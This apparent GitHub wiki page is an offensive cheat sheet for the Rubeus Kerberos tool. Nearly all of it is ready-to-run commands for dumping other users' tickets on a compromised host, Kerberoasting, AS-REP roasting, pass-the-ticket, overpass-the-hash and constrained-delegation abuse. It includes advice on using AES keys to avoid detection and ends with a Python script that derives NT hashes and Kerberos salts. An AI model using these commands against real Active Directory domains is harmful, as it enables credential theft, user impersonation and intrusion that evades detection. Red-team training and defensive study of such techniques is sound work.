Rubeus - CraigDonkin/Infrastructure GitHub Wiki

Rubeus

https://github.com/GhostPack/Rubeus

List Kerberos tickets

  • triage lists the Kerberos tickets in the current logon session.
    • If it is run from an elevated (admin) shell, it lists the tickets for every logon session on the compromised host.
Rubeus.exe triage
  • monitor watches for new logon sessions and extracts any new TGTs. /interval:<seconds> is how often it polls; it runs until stopped unless /runfor:<seconds> limits it to a fixed period.
  • To only capture tickets for a specific user, use /targetuser:<user>.
  • As with dump, seeing other users' sessions requires an elevated context.
Rubeus.exe monitor /interval:<seconds> /nowrap
Rubeus.exe monitor /interval:<seconds> /targetuser:<user>

Extract Kerberos tickets

  • Use the dump command. From a low-privileged context it only dumps tickets for the current logon session; from an elevated context it dumps tickets for every session on the host.
Rubeus.exe dump
  • To narrow it down, use the /luid and /service parameters (for example /service:krbtgt to dump only TGTs).
Rubeus.exe dump /luid:<luid> /service:<service>
  • The /nowrap option prints the base64 ticket on a single line, which makes it easier to copy into ptt or a /ticket parameter later.

Kerberoast

Rubeus.exe kerberoast
Rubeus.exe kerberoast /user:<username> /nowrap

ASREPRoast

Rubeus.exe asreproast /user:<username> /nowrap
Rubeus.exe asreproast /format:hashcat /outfile:<outputfile> /user:<username>

Pass the ticket

  • /ticket accepts either the base64 blob printed by dump or asktgt, or a path to a .kirbi file.
  • Without /luid the ticket is imported into the current logon session; /luid:<luid> imports it into another session, which needs an elevated context.
Rubeus.exe ptt /luid:<luid> /ticket:<base64 encoded ticket>
Rubeus.exe ptt /ticket:<.kirbi file>

Overpass the hash

  • Requests a TGT with the account's Kerberos key instead of its password. /ntlm (also accepted as /rc4) is the RC4 key, i.e. the NT hash.
Rubeus.exe asktgt /user:<username> /ntlm:<ntlm hash> /nowrap

  • Using the RC4 key makes the AS-REQ use RC4, which is a downgrade on a domain where AES is normal and is easier to spot. If you have the AES256 key (see the hash section), use it so the request looks like a standard Windows client:
Rubeus.exe asktgt /user:<username> /aes256:<aes256 key> /nowrap
  • Add /ptt to import the resulting TGT into the current logon session instead of only printing it.

Createnetonly

  • The equivalent of runas /netonly: it creates a new (hidden) process with a LOGON32_LOGON_NEW_CREDENTIALS logon, so the process gets its own logon session that a TGT can be applied to without touching the tickets in your current session.
  • The /username, /password and /domain values are only used for network authentication and are not checked locally, so they do not have to be real credentials; /ticket applies the TGT to the new session.
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<domain> /username:<username> /password:<password> /ticket:<TGT>

s4u

  • Constrained delegation abuse (S4U2self followed by S4U2proxy). /user is the account with msDS-AllowedToDelegateTo set, /msdsspn is one of the SPNs listed there, and /impersonateuser is the user you want a service ticket for. The delegating account's TGT is either requested from its key (/rc4, or /aes256) or supplied with /ticket. Without /msdsspn only the S4U2self step is performed and that ticket is printed.
Rubeus.exe s4u /user:<user with delegation rights> /rc4:<RC4 hash> /impersonateuser:<user to be impersonated>
Rubeus.exe s4u /impersonateuser:<user to be impersonated> /msdsspn:<SPN that /user can delegate to> /user:<user with delegation rights> /ticket:<TGT for /user>
  • The service name (sname) in a service ticket is in the unencrypted part of the ticket, so Rubeus can rewrite it with /altservice. A ticket obtained for one service class (e.g. cifs) can then be presented to another (e.g. ldap) on the same host; the host must stay the same, because the ticket is still encrypted with that host's account key.
Rubeus.exe s4u /impersonateuser:<user to be impersonated> /msdsspn:<SPN that /user can delegate to> /user:<user with delegation rights> /altservice:ldap /ticket:<TGT for /user>

Hash

  • Generates the rc4_hmac key of the password (the NT hash, MD4 of the UTF-16LE password). This form needs only the password because it is unsalted.
  • If /user and /domain are also given it derives the other key types too, such as the AES ones. These need the user and domain because the AES keys are salted with the uppercased domain name plus the account name (for computer accounts, host<hostname>.<domain>), and the salt is case-sensitive, so a wrong username case gives a wrong key.
Rubeus.exe hash /password:<password> /user:<computername>$ /domain:<domain>
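To make the salt point concrete, the script below, an added example rather than Rubeus code, computes rc4_hmac exactly as Rubeus does (MD4 over the UTF-16LE password, no salt) and builds the default Active Directory string-to-key salt for user and computer accounts, which is what /user and /domain feed into. MD4 is implemented inline because many OpenSSL builds disable it in hashlib. The AES keys themselves continue from this salt with PBKDF2-HMAC-SHA1 (4096 iterations) and the RFC 3962 DK step, which needs an AES implementation and is not included here; the account names and domain used are constructed.

```python
"""rc4_hmac (NT hash) and the Kerberos string-to-key salt behind 'Rubeus hash /user /domain'.

Added example, not Rubeus code. MD4 is implemented inline (RFC 1320) because
OpenSSL-backed hashlib often lacks it. The accounts and domain are constructed.
"""
import struct

M = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & M


def md4(data):
    """RFC 1320 MD4 digest of data (bytes); returns 16 bytes."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Padding: 0x80, zeros to 56 mod 64, then 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)):  # round 2
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & M, (b0 + b) & M, (c0 + c) & M, (d0 + d) & M
    return struct.pack("<4I", a0, b0, c0, d0)


def rc4_hmac(password):
    """Rubeus 'rc4_hmac' = NT hash = MD4(UTF-16LE(password)). Unsalted: no /user or /domain needed."""
    return md4(password.encode("utf-16-le")).hex()


def kerberos_salt(user, domain):
    """Default AD salt for the AES/DES string-to-key derivation (MS-KILE 3.1.1.2).

    User accounts:     UPPERCASE realm + case-sensitive sAMAccountName.
    Computer accounts: UPPERCASE realm + 'host' + lowercase host FQDN (the trailing $ dropped).
    This is why Rubeus needs /user and /domain, and why their case matters.
    """
    realm = domain.upper()
    if user.endswith("$"):
        return realm + "host" + user[:-1].lower() + "." + domain.lower()
    return realm + user


if __name__ == "__main__":
    # Constructed inputs: hypothetical domain corp.local, user jdoe, computer WEB01$.
    print("rc4_hmac('password') =", rc4_hmac("password"))
    print("salt for jdoe   :", kerberos_salt("jdoe", "corp.local"))
    print("salt for WEB01$ :", kerberos_salt("WEB01$", "corp.local"))
```

Note that a user salt built with the wrong letter case (for example jdoe versus JDoe) still produces a 32-byte AES256 key, just the wrong one, so an asktgt with it will fail pre-authentication; the rc4_hmac value is unaffected because it never sees the username.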